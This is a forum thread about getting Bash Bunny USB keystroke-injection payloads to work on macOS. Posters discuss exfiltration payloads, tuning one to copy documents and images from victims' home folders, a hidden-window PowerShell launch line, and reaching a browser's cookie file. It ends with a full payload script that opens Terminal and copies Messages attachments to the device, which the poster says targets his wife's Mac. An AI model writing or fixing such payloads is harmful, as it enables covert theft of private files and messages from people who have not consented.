WiFiJuice Posted September 3, 2017 Share Posted September 3, 2017 Guys, what Bash Bunny payloads have you got any success with on OS X? Quote Link to comment Share on other sites More sharing options...
Firestorm Posted September 3, 2017 Share Posted September 3, 2017 (edited) No. what is your problem with yours Bash Bunny. Edited September 5, 2017 by Firestorm Quote Link to comment Share on other sites More sharing options...
Opticon Posted September 5, 2017 Share Posted September 5, 2017 @WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. However, the one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-) 1 Quote Link to comment Share on other sites More sharing options...
couchTornado Posted September 7, 2017 Share Posted September 7, 2017 Granted this was my first attempt at running a payload from the BB on Mac OSX but even after choosing the correct ethernet device, the nmap payload failed because OSX requires root to run the OS fingerprinting functions. NMAP has been this way for a long time (even prior to the security upgrades introduced a couple of versions ago). Working at an art school we run MacOS everywhere (80-90% of our machines across academic and administrative units) I'll keep poking at it, but if anyone has an easy fix, I'm all ears. Quote Link to comment Share on other sites More sharing options...
WiFiJuice Posted September 7, 2017 Author Share Posted September 7, 2017 Awesome work with the Macinfograbber :) Thanks @Opticon. Hope we will have more Mac OS X payloads working on the BB soon. It's has a huge percentage of the operating system market share: http://gs.statcounter.com/os-market-share/all/united-states-of-america Quote Link to comment Share on other sites More sharing options...
Opticon Posted September 7, 2017 Share Posted September 7, 2017 Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and don't you know- it works on them all! However, @couchTornado has a valid point regarding NMAP and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if NMAP can't be used, what if we just call upon something inherent to Terminal? Such as: Scan the available wireless networks: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s Setup a network listener on port 2196 for testing: /usr/bin/nc -l 2196 Capture some packets: tcpdump -nS Capture all the packets:tcpdump -nnvvXS Capture the packets for a given port: tcpdump -nnvvXs 548 These are just a couple of things to consider while I toil away with a proper OSX NMAP hack. Cheers! Quote Link to comment Share on other sites More sharing options...
WiFiJuice Posted September 7, 2017 Author Share Posted September 7, 2017 @Opticon do you mind sharing your payload? Mine didn't work... Have a Swedish keyboard, so used "QUACK SET_LANGUAGE se" on top, but it didn't do the trick... Quote Link to comment Share on other sites More sharing options...
Opticon Posted September 7, 2017 Share Posted September 7, 2017 @WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone! Quote Link to comment Share on other sites More sharing options...
WiFiJuice Posted September 7, 2017 Author Share Posted September 7, 2017 3 hours ago, Opticon said: @WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone! @Opticon just sent you a DM :) Quote Link to comment Share on other sites More sharing options...
Opticon Posted September 7, 2017 Share Posted September 7, 2017 @WiFiJuice The DM has been sent and I hope you enjoy it! Let me know if there's anything you would add or subtract from the payload. Cheers! Quote Link to comment Share on other sites More sharing options...
Opticon Posted September 7, 2017 Share Posted September 7, 2017 For reasons unknown to myself, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist, however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-) 1 Quote Link to comment Share on other sites More sharing options...
Opticon Posted September 8, 2017 Share Posted September 8, 2017 Well @WiFiJuice I'll get working on it. However, here's a pertinent question, what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3. Restores and switches that won't execute payloads etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al to answer. -Cheers Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted September 8, 2017 Share Posted September 8, 2017 Please don't tag everyone like that, if they deem it important enough for them to give their answer (Sebkinne answers if no one else has, or if he wants to add to something or if he wants to confirm something - but Darren rarely does). Not to mention you left me out ... :( I myself have had no problems with firmware 1.3, and most of the payload library works with 1.3, therefore not working with 1.2 very well. Not sure why you would be getting weird switch errors.. Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted September 8, 2017 Share Posted September 8, 2017 Use 1.3 1 Quote Link to comment Share on other sites More sharing options...
WiFiJuice Posted September 8, 2017 Author Share Posted September 8, 2017 How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows: QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')" Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted September 8, 2017 Share Posted September 8, 2017 2 hours ago, WiFiJuice said: How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows: QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')" Use python. Do not have the code off the top of my head right now but when I get around to it (too much at work right now and part of too many projects) I plan on making the BBTPS cross platform with the OSX and Linux agent parts being done in python. Issue with the above is I know on Linux you need to be root or using sudo to mount a removable drive. That is the reason I chose the network approach for the BBTPS so I do not have to worry about mounting anything on the victim. Quote Link to comment Share on other sites More sharing options...
WiFiJuice Posted September 8, 2017 Author Share Posted September 8, 2017 The Swedish language file is wrong @Sebkinne for example it can't write out a "~" correctly and messes up my code... How can this be fixed? Quote Link to comment Share on other sites More sharing options...
Opticon Posted September 8, 2017 Share Posted September 8, 2017 @WiFiJuice You bring up an excellent point, one that I would wished the developers would have anticipated. Hopefully, as you've addressed this problem before, they will look into resolving language files. Perhaps it's the reason my payload didn't work for you, but that's only speculation. 1 Quote Link to comment Share on other sites More sharing options...
RazerBlade Posted September 8, 2017 Share Posted September 8, 2017 2 hours ago, WiFiJuice said: The Swedish language file is wrong @Sebkinne for example it can't write out a "~" correctly and messes up my code... How can this be fixed? Im also using the swedish keyboard layout. As with my experience the language file works great on windows but as you said spells out the character wrong. Quote Link to comment Share on other sites More sharing options...
RazerBlade Posted September 8, 2017 Share Posted September 8, 2017 It appears that to type ~ on Mac with Swedish Pro layout which most Swedish user do, it's alt + ¨ which the mac interprets as ~. So the keyboard file has to be changed. Quote Link to comment Share on other sites More sharing options...
WiFiJuice Posted September 8, 2017 Author Share Posted September 8, 2017 5 minutes ago, RazerBlade said: It appears that to type ~ on Mac with Swedish Pro layout which most Swedish user do, it's alt + ¨ which the mac interprets as ~. So the keyboard file has to be changed. Yes, that that little character is really important to be able to write out something like "~/Library/Application\\ Support/Google/Chrome/Default/Cookies" Quote Link to comment Share on other sites More sharing options...
WiFiJuice Posted September 10, 2017 Author Share Posted September 10, 2017 This is the layout of the Swedish Pro Keyboard. The se.json file in https://github.com/hak5/bashbunny-payloads/tree/master/languages is corrupt. It can't write out the very important Tilde sign " ~ " nor can it write out a backslash " \ ". Can anyone please help out to fix this issue? I will donate $50 in BTC to the one that fixes this, as I really need my BB to work. 1 Quote Link to comment Share on other sites More sharing options...
ldopanda Posted September 13, 2017 Share Posted September 13, 2017 I am actually work on OSX specific keyboard layout. At the moment to resolve keyboard issue on OSX sxitch to pc layout in keyboard setting Quote Link to comment Share on other sites More sharing options...
ImInAjar Posted January 4, 2019 Share Posted January 4, 2019 @Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work: QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \; script dies at this line with output find: -exec: no terminating ";" or "+" cant find any documentation on what may be happening. Any help would be great. Quote Link to comment Share on other sites More sharing options...
ImInAjar Posted January 4, 2019 Share Posted January 4, 2019 1 minute ago, ImInAjar said: @Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work: QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \; script dies at this line with output find: -exec: no terminating ";" or "+" cant find any documentation on what may be happening. Any help would be great. Full script: #!/bin/bash LED G R ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E lootdir=loot/MacLoot mkdir -p /root/udisk/$lootdir QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 5000 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/images QUACK ENTER QUACK DELAY 500 QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \; QUACK ENTER # Sync filesystem sync # Green LED for finished LED G files=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l) files2=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l) if [ "$files" != "0" -o "$files2" != "0"]; then # Got spreadsheet files LED R B else LED R # No spread sheets fi #Eject BB QUACK diskutil unmount BashBunny; killall terminal Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.